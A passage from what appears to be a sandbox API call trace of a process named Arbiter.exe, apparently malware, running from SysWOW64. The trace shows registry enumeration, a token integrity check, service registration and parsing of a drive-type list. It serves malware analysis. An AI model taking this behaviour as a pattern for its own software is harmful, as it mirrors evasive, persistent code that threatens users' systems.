lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0069.709] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0069.709] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0069.709] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0069.709] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0069.709] lstrlenW (lpString="MediaInterfaces") returned 15 [0069.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ea8 [0069.709] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0069.710] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0069.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ea8 | out: hHeap=0x6d0000) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edc90 [0069.710] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0069.710] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0069.710] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0069.710] lstrlenW (lpString="MediaProperties") returned 15 [0069.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ea8 [0069.710] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0069.710] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0069.710] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0069.710] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0069.710] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0069.710] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0069.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ea8 | out: hHeap=0x6d0000) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edcc0 [0069.710] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0069.710] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0069.710] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0069.710] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0069.710] lstrlenW (lpString="MediaTypes") returned 10 [0069.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ea8 [0069.710] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0069.711] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0069.711] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0069.711] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0069.711] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0069.711] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0069.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ea8 | out: hHeap=0x6d0000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ea8 [0069.711] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0069.711] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0069.711] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0069.711] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0069.711] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0069.711] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0069.711] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0069.711] lstrlenW (lpString="MobilePC") returned 8 [0069.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed230 [0069.711] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0069.711] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0069.711] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0069.711] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0069.711] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0069.711] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0069.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7ec8 [0069.712] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0069.712] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0069.712] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0069.712] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0069.712] lstrlenW (lpString="MPDEV") returned 5 [0069.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ee8 [0069.712] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0069.712] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0069.712] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0069.712] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0069.712] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0069.712] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0069.712] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0069.712] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0069.712] lstrlenW (lpString="MSDTC") returned 5 [0069.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7f08 [0069.712] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0069.712] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0069.712] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0069.712] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0069.712] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0069.712] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0069.713] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0069.713] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0069.713] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0069.713] lstrlenW (lpString="MUI") returned 3 [0069.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7f28 [0069.713] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0069.713] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0069.713] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0069.713] lstrlenW (lpString="NetDiagFx") returned 9 [0069.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7f48 [0069.713] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0069.713] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0069.713] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0069.713] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0069.713] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0069.713] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0069.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7f68 [0069.714] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0069.714] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0069.714] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0069.714] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0069.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7f88 [0069.714] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0069.714] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0069.714] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0069.714] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0069.714] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0069.714] lstrlenW (lpString="NetTrace") returned 8 [0069.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7fa8 [0069.714] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0069.714] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0069.715] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0069.715] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0069.715] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0069.715] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0069.715] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0069.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7fa8 | out: hHeap=0x6d0000) returned 1 [0069.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7fa8 [0069.715] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0069.715] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0069.715] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0069.715] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0069.715] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0069.715] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0069.715] lstrlenW (lpString="Network") returned 7 [0069.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed258 [0069.715] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0069.715] lstrlenW (lpString="NetworkProvider") returned 15 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed280 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0069.716] lstrlenW (lpString="Nls") returned 3 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7fc8 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0069.716] lstrlenW (lpString="NodeInterfaces") returned 14 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7fe8 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0069.716] lstrlenW (lpString="Nsi") returned 3 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8008 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0069.716] lstrlenW (lpString="PCW") returned 3 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8028 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0069.716] lstrlenW (lpString="PnP") returned 3 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e8048 [0069.716] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0069.716] lstrlenW (lpString="Power") returned 5 [0069.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8068 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0069.717] lstrlenW (lpString="Print") returned 5 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8088 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0069.717] lstrlenW (lpString="PriorityControl") returned 15 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed2a8 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0069.717] lstrlenW (lpString="ProductOptions") returned 14 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed2d0 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0069.717] lstrlenW (lpString="Remote Assistance") returned 17 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed320 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0069.717] lstrlenW (lpString="SafeBoot") returned 8 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e80a8 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0069.717] lstrlenW (lpString="ScsiPort") returned 8 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e80e8 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0069.717] lstrlenW (lpString="SecurePipeServers") returned 17 [0069.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed348 [0069.717] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0069.718] lstrlenW (lpString="SecurityProviders") returned 17 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed398 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0069.718] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed3e8 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0069.718] lstrlenW (lpString="ServiceProvider") returned 15 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed410 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0069.718] lstrlenW (lpString="Session Manager") returned 15 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed410 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0069.718] lstrlenW (lpString="SNMP") returned 4 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8148 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0069.718] lstrlenW (lpString="SQMServiceList") returned 14 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edd20 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0069.718] lstrlenW (lpString="Srp") returned 3 [0069.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8168 [0069.718] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0069.719] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8188 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0069.719] lstrlenW (lpString="StillImage") returned 10 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8188 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0069.719] lstrlenW (lpString="Storage") returned 7 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed460 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0069.719] lstrlenW (lpString="SystemResources") returned 15 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed488 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0069.719] lstrlenW (lpString="TabletPC") returned 8 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed4b0 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0069.719] lstrlenW (lpString="Terminal Server") returned 15 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed4d8 [0069.719] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0069.719] lstrlenW (lpString="TimeZoneInformation") returned 19 [0069.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e81c8 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0069.720] lstrlenW (lpString="usbflags") returned 8 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed528 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0069.720] lstrlenW (lpString="usbstor") returned 7 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed550 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0069.720] lstrlenW (lpString="VAN") returned 3 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8208 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0069.720] lstrlenW (lpString="Video") returned 5 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8228 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0069.720] lstrlenW (lpString="wcncsvc") returned 7 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed578 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0069.720] lstrlenW (lpString="Wdf") returned 3 [0069.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8248 [0069.720] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0069.720] lstrlenW (lpString="WDI") returned 3 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8268 [0069.721] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0069.721] lstrlenW (lpString="Windows") returned 7 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed5a0 [0069.721] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0069.721] lstrlenW (lpString="Winlogon") returned 8 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed5c8 [0069.721] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0069.721] lstrlenW (lpString="WMI") returned 3 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8288 [0069.721] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0069.721] lstrlenW (lpString="hivelist") returned 8 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed5f0 [0069.721] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0069.721] lstrlenW (lpString="SystemInformation") returned 17 [0069.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6edd68 [0069.722] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0069.722] lstrlenW (lpString="Winresume") returned 9 [0069.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6edd68 [0069.722] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0069.722] RegCloseKey (hKey=0xc4) returned 0x0 [0069.722] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\Arbiter.exe -s" [0069.722] StrChrW (lpStart="C:\\Windows\\SysWOW64\\Arbiter.exe -s", wMatch=0x20) returned=" -s" [0069.722] StrTrimW (in: psz="-s", pszTrimChars=" " | out: psz="-s") returned 0 [0069.722] GetVersion () returned 0x1db10106 [0069.722] GetCurrentProcess () returned 0xffffffff [0069.722] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0xc4) returned 1 [0069.722] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0069.722] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0069.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e82a8 [0069.722] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x6e82a8, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x6e82a8, ReturnLength=0x18ff28) returned 1 [0069.723] GetSidSubAuthorityCount (pSid=0x6e82b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 0x6e82b1 [0069.723] GetSidSubAuthority (pSid=0x6e82b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000), nSubAuthority=0x0) returned 0x6e82b8 [0069.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e82a8 | out: hHeap=0x6d0000) returned 1 [0069.723] CloseHandle (hObject=0xc4) returned 1 [0069.723] CommandLineToArgvW (in: lpCmdLine="-s", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x6dedb0*="-s" [0069.723] lstrlenW (lpString="-s") returned 2 [0069.723] StartServiceCtrlDispatcherW (lpServiceTable=0x18ff38*(lpServiceName="Arbiter", lpServiceProc=0x401e44)) [0070.021] SetEvent (hEvent=0xe8) returned 1 Thread: id = 325 os_tid = 0x5e0 Thread: id = 326 os_tid = 0x418 Thread: id = 327 os_tid = 0x6c0 [0069.735] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xe8 [0069.735] RegisterServiceCtrlHandlerW (lpServiceName="Arbiter", lpHandlerProc=0x406862) returned 0x6edf70 [0069.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x406d62, lpParameter=0x40a5d4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0069.736] SetServiceStatus (hServiceStatus=0x6edf70, lpServiceStatus=0x100ff4c*(dwServiceType=0x30, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0069.738] WaitForMultipleObjects (nCount=0x2, lpHandles=0x100ff68*=0xe8, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 328 os_tid = 0x6dc [0069.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6f2ec0 [0069.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6edfe8 [0069.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x36) returned 0x6f4b78 [0069.739] _wcslwr (in: _String=0x6f4b78 | out: _String="movable|fixed|remote|share") returned="movable|fixed|remote|share" [0069.739] StrChrW (lpStart="movable|fixed|remote|share", wMatch=0x7c) returned="|fixed|remote|share" [0069.739] StrChrW (lpStart="fixed|remote|share", wMatch=0x7c) returned="|remote|share" [0069.739] StrChrW (lpStart="remote|share", wMatch=0x7c) returned="|share" [0069.739] StrChrW (lpStart="share", wMatch=0x7c) returned 0x0 [0069.739] lstrlenW (lpString="share") returned 5 [0069.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4b78 | out: hHeap=0x6d0000) returned 1 [0069.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f4b78 [0069.739] StrToIntExW (in: pszString="128", dwFlags=0x0, piRet=0x114ff60 | out: piRet=0x114ff60) returned 1 [0069.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4b78 | out: hHeap=0x6d0000) returned 1 [0069.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f4b78 [0069.739] StrToIntExW (in: pszString="20", dwFlags=0x0, piRet=0x114ff64 | out: piRet=0x114ff64) returned 1 [0069.739] HeapFree (in: 